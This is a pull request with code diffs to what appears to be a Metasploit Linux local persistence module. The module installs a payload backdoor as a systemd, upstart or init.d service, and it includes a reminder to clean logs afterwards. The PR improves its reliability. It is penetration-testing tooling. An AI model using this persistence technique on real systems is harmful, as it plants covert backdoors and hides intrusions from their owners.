### PR TITLE
service_persistence.rb fixes

### DIFF
--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -147,9 +147,10 @@ ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
 WantedBy=multi-user.target}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
-    vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
-    write_file("/lib/systemd/system/#{service_filename}.service", script)
-    if !file_exist?(backdoor)
+    service_name = "/lib/systemd/system/#{service_filename}.service"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
       print_error('File not written, check permissions.')
       return
     end
@@ -174,9 +175,10 @@ respawn
 respawn limit unlimited}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
-    vprint_status("Writing service: /etc/init/#{service_filename}.conf")
-    write_file("/etc/init/#{service_filename}.conf", script)
-    if !file_exist?(backdoor)
+    service_name = "/etc/init/#{service_filename}.conf"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
       print_error('File not written, check permissions.')
       return
     end
@@ -219,7 +221,8 @@ case \"$1\" in
         echo \"Already started\"
     else
         echo \"Starting $name\"
-        cd \"$dir\"}
+        cd \"$dir\"
+}
 
     if has_updatercd
       script << "        sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
@@ -283,18 +286,23 @@ esac
 exit 0}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
-    vprint_status("Writing service: /etc/init.d/#{service_filename}")
-    write_file("/etc/init.d/#{service_filename}", script)
-    if !file_exist?(backdoor)
+    service_name = "/etc/init.d/#{service_filename}"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
       print_error('File not written, check permissions.')
       return
     end
-    cmd_exec("chmod 755 /etc/init.d/#{service_filename}")
+    cmd_exec("chmod 755 #{service_name}")
     vprint_status('Enabling & starting our service')
     if has_updatercd
       cmd_exec("update-rc.d #{service_filename} defaults")
       cmd_exec("update-rc.d #{service_filename} enable")
-      cmd_exec("service #{service_filename} start")
+      if file_exist?('/usr/sbin/service') # some systems have update-rc.d but not service binary, have a fallback just in case
+        cmd_exec("service #{service_filename} start")
+      else
+        cmd_exec("/etc/init.d/#{service_filename} start")
+      end
     else # CentOS
       cmd_exec("chkconfig --add #{service_filename}")
       cmd_exec("chkconfig #{service_filename} on")

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -81,6 +81,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     backdoor = write_shell(datastore['SHELLPATH'])
+    if backdoor.nil?
+      return
+    end
     path = backdoor.split('/')[0...-1].join('/')
     file = backdoor.split('/')[-1]
     case target.name
@@ -120,8 +123,13 @@ class MetasploitModule < Msf::Exploit::Local
     backdoor = "#{path}/#{file_name}"
     vprint_status("Writing backdoor to #{backdoor}")
     write_file(backdoor, payload.encoded)
-    cmd_exec("chmod 711 #{backdoor}")
-    backdoor
+    if file_exist?(backdoor)
+      cmd_exec("chmod 711 #{backdoor}")
+      backdoor
+    else
+      print_error('File not written, check permissions.')
+      return
+    end
   end
 
   def systemd(backdoor_path, backdoor_file)
@@ -141,6 +149,10 @@ WantedBy=multi-user.target}
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
     write_file("/lib/systemd/system/#{service_filename}.service", script)
+    if !file_exist?(backdoor)
+      print_error('File not written, check permissions.')
+      return
+    end
     vprint_status('Enabling service')
     cmd_exec("systemctl enable #{service_filename}.service")
     vprint_status('Starting service')
@@ -164,6 +176,10 @@ respawn limit unlimited}
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init/#{service_filename}.conf")
     write_file("/etc/init/#{service_filename}.conf", script)
+    if !file_exist?(backdoor)
+      print_error('File not written, check permissions.')
+      return
+    end
     vprint_status('Starting service')
     cmd_exec("initctl start #{service_filename}")
     vprint_status("Dont forget to clean logs: /var/log/upstart/#{service_filename}.log")
@@ -269,6 +285,10 @@ exit 0}
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init.d/#{service_filename}")
     write_file("/etc/init.d/#{service_filename}", script)
+    if !file_exist?(backdoor)
+      print_error('File not written, check permissions.')
+      return
+    end
     cmd_exec("chmod 755 /etc/init.d/#{service_filename}")
     vprint_status('Enabling & starting our service')
     if has_updatercd


### PR DESCRIPTION
This module does some cleanup and fixes on service_persistence.rb

As per #8480 cleaned up a newline issue, only to discover that metasploitable 2 has `update-rc.d` and not `service`, so I put in a fallback for that.

Also better consistency with variables instead of strings.

Also check to make sure the service is written to disk before chmod/exec/start it, as I noticed when testing against metasploitable2 w/o sudo first.